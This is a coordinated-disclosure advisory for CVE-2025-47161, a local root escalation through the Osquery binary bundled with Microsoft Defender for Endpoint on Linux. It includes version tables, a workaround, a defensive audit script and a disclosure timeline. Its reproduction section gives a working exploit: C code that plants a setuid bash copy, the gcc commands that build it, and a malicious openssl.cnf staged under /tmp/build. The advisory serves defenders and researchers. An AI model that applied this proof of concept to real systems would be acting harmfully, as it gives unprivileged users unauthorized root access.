May 27, 2025

By Rich Mirch

Vulnerability advisory: Osquery component bundled with Microsoft Defender for Endpoint on Linux

Stratascale’s Cybersecurity Research Unit (CRU) discovered a local privilege escalation flaw in Microsoft Defender for Endpoint on Linux (CVE-2025-47161). The Osquery component allowed unprivileged users to gain root access. Microsoft has issued a patch—learn more to stay protected.

Introduction

Microsoft Defender for Endpoint (MDE) is a comprehensive enterprise endpoint security platform designed to help organizations prevent, detect, investigate, and respond to advanced threats. It safeguards a wide range of devices, including Windows and Mac client computers, Windows and Linux servers, as well as iOS and Android mobile devices. It provides various capabilities such as endpoint detection and response, threat protection, and posture management. Source: Microsoft Defender for Endpoint on Linux.

The Stratascale Cyber Research Unit (CRU) team discovered an elevation of privilege vulnerability in the Osquery component bundled with MDE. Osquery is a powerful open-source utility that “uses basic SQL commands to leverage a relational data model to describe a device.” MDE uses Osquery to query information about the system.

Impact

  • A local unprivileged user could elevate permissions to root if a vulnerable version is installed.

Remediation

MDE for Linux Versions

Status          | Build                              | Release Version
Not Vulnerable  | May-2025 Build: 101.25032.0008     | 30.125032.0008.0
Remediated      | April-2025 Build: 101.25022.0002   | 30.125022.0001.0
Vulnerable      | March-2025 Build: 101.25012.0000   | 30.125012.0000.0
Vulnerable      | Feb-2025 Build: 101.24122.0008     | 20.124112.0008.0
Vulnerable      | Feb-2025 Build: 101.24112.0003     | 30.124112.0003.0
Vulnerable      | Jan-2025 Build: 101.24112.0001     | 30.124112.0001.0
Vulnerable      | Jan-2025 Build: 101.24102.0000     | 30.124102.0000.0
Not Vulnerable  | Nov-2024 Build: 101.24092.0002     | 30.124092.0002.0
Not Vulnerable  | Oct-2024 Build: 101.24082.0004     | 30.124082.0004.0

Tactical Workaround

If you are unable to upgrade, a simple workaround will prevent exploitation of this vulnerability. Ensure the /tmp/build directory exists, is owned by root, and is not writable by any other account.

# run as root so the directory is root-owned
mkdir -m 700 /tmp/build
# optionally set the immutable flag for ext* filesystems to prevent deletion
chattr +i /tmp/build

Note: The vulnerability was verified on Ubuntu 24.04.1 LTS and 24.04.2 LTS.

CVE-2025-47161 Elevation of Privilege Walkthrough

The MDE on Linux package includes the osqueryi CLI. Osqueryi provides a uniform way to query details about the system using a SQL-like interface. For example, to query a subset of information for any processes named chronyd, the following simple query can be used on the command line.

The MDE daemon executes osqueryi approximately every 10 minutes to collect a subset of system information. This means a local unprivileged user could gain code execution as root within 10 minutes (the worst case).

What makes this elevation of privilege vulnerability particularly notable is that it does not stem from a coding defect, business logic error, or insecure configuration. Instead, the issue arises from the way the osqueryi binary is compiled against the OpenSSL dependencies. When an application is built and linked to OpenSSL libraries, there are predefined variables such as OPENSSLDIR that control where the OpenSSL functions will look for configurations and libraries.

Elevation of privilege issues can surface when a program is built with OPENSSLDIR pointing to a non-default location that is writable by unprivileged users. This issue has been commonly observed in environments that use CI/CD automation to cross-compile software. Cross-compilation allows one system (for example, a Linux server) to generate binaries for another (such as Windows), streamlining development by reducing the need for multiple target systems.

In this case, the bundled osqueryi binary was built with the OPENSSLDIR path set to /tmp/build. This value is hardcoded into the binary. To find the value, simply execute strings on the binary or linked library (normally libcrypto.so).
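The following audit helper is an added example for defenders; it is not code from Stratascale or Microsoft. It combines the two checks described above: it pulls the compiled-in OPENSSLDIR out of a binary with strings (OpenSSL embeds it as the literal OPENSSLDIR: "/path") and then verifies that the directory satisfies the tactical workaround (a real root-owned directory, not a symlink, not group- or world-writable). It assumes GNU coreutils and binutils as on Ubuntu 24.04; the default binary path is the osqueryi path the advisory names, and the OPENSSLDIR string may instead live in a separate libcrypto.so, which can be passed as the argument.

```shell
#!/bin/sh
# Added audit helper for CVE-2025-47161; not part of the advisory or MDE.

# Read `strings` output on stdin and print the compiled-in OPENSSLDIR.
# OpenSSL's cversion.c embeds it as:  OPENSSLDIR: "/some/path"
parse_openssldir() {
  sed -n 's/^OPENSSLDIR: "\(.*\)"$/\1/p' | head -n 1
}

# OPENSSLDIR of a file on disk (the osqueryi binary or its libcrypto.so).
openssldir_of() {
  strings -- "$1" 2>/dev/null | parse_openssldir
}

# Return 0 when DIR matches the workaround: a real directory (not a symlink),
# owned by OWNER_UID (default 0 = root), with no group/other write bit.
dir_is_hardened() {
  dir=$1
  want_uid=${2:-0}
  [ -L "$dir" ] && return 1            # a symlink could redirect into a writable tree
  [ -d "$dir" ] || return 1            # missing: anyone can create it in /tmp
  uid=$(stat -c '%u' "$dir") || return 1
  [ "$uid" = "$want_uid" ] || return 1
  perm=$(stat -c '%A' "$dir") || return 1
  case $perm in
    d????w*|d???????w*) return 1 ;;    # group (col 6) or other (col 9) write bit
  esac
  return 0
}

# Host verdict: 0 = hardened or default location, 1 = exploitable layout,
# 2 = no OPENSSLDIR string found in the file examined.
audit_mde_openssldir() {
  bin=${1:-/opt/microsoft/mdatp/sbin/osqueryi}
  dir=$(openssldir_of "$bin")
  if [ -z "$dir" ]; then
    echo "no OPENSSLDIR string found in $bin"
    return 2
  fi
  echo "OPENSSLDIR=$dir"
  if dir_is_hardened "$dir"; then
    echo "$dir is root-owned and not writable by others: hardened"
    return 0
  fi
  echo "$dir is missing, not root-owned, a symlink, or writable: VULNERABLE"
  return 1
}
```

Run audit_mde_openssldir from a root cron job or configuration-management check and alert on a non-zero exit; on patched builds the reported directory should be a root-owned location outside /tmp.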

Because /tmp is world-writable by design, a local user can stage a malicious OpenSSL configuration file and shared object. When MDE executes osqueryi as root, it will load the arbitrary shared object file, resulting in code execution as root.

Steps to Reproduce

Create a file named mde-lpe.c with the following code.

Proof of concept code:

#include <stdlib.h>
#include <unistd.h>

/* Set as the library's init routine via -Wl,-init,woot below, so it runs
   as soon as OpenSSL loads the engine, i.e. under osqueryi's root context. */
void woot(){
  system("/bin/cp /bin/bash /tmp/woot;/bin/chmod 4755 /tmp/woot");
}

Compile the C program to create a shared library using the following gcc commands.

gcc -fPIC -o woot.o -Wall -c mde-lpe.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

Execute the following mkdir command to create the OPENSSLDIR directory path.

mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

Create a file named openssl.cnf in the /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/ directory. This is the “malicious” OpenSSL configuration that will trick the osqueryi utility into loading the /tmp/woot.so shared library every time it’s executed.

# Malicious openssl.cnf
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0

Monitor for the existence of /tmp/woot for the next ~10 minutes. When the binary exists, execute /tmp/woot to get a root shell.

/tmp/woot -p

Putting it all together in a script yields a root shell within ten minutes. Note: No attempt was made to be stealthy for this PoC. MDE will flag and alert on this action.

To show the process hierarchy, the above shared object was modified to execute the ps command and store the output in a file. The below process list was extracted from /woot.txt and formatted to make it easier to read. This shows osqueryi running the ps command.

Note: If you want to manually test the vulnerability without waiting up to ten minutes, execute the following command as root.

/opt/microsoft/mdatp/sbin/osqueryi "select count() from processes"

The Fix

Microsoft resolved this by changing the OPENSSLDIR build environment variable to a location that would not be writable by default on Linux systems.

Disclosure Timeline

2025-02-07 Vulnerability submitted to MSRC.
2025-02-10 MSRC opened a case for the issue.
2025-02-17 MSRC replied, unable to reproduce the issue with manual steps.
2025-02-17 Added information to the case.
2025-02-19 Sent a follow-up email.
2025-02-20 Added information to the case.
2025-02-20 MSRC was able to reproduce with the added information.
2025-03-03 MSRC officially confirms the issue. Status changed to Develop.
2025-04-08 Requested status update.
2025-04-16 MSRC replied – no change in status.
2025-04-22 Retested the April 07th 2025 release and found the issue was fixed.
2025-04-22 Notified MSRC the issue was fixed.
2025-05-09 MSRC confirms the fix was pushed out and will request a CVE.
2025-05-09 Requested MSRC to confirm disclosure date.
2025-05-15 Case automatically closed. Requested MSRC for an update on the CVE assignment.
2025-05-21 Requested update from MSRC.
2025-05-21 MSRC responded with CVE-2025-47161.
2025-05-21 Informed MSRC that CRU will publish a blog and asked if they wanted to review.
2025-05-22 Informed MSRC that a blog will be published on 5/27/25.
2025-05-22 MSRC requested draft blog for review.
2025-05-22 Sent MSRC draft blog.
2025-05-27 Coordinated Public Disclosure.

Credit

The CVE-2025-47161 MDE on Linux Elevation of Privilege vulnerability was discovered and reported to Microsoft by Rich Mirch of the Stratascale Cyber Research Unit.
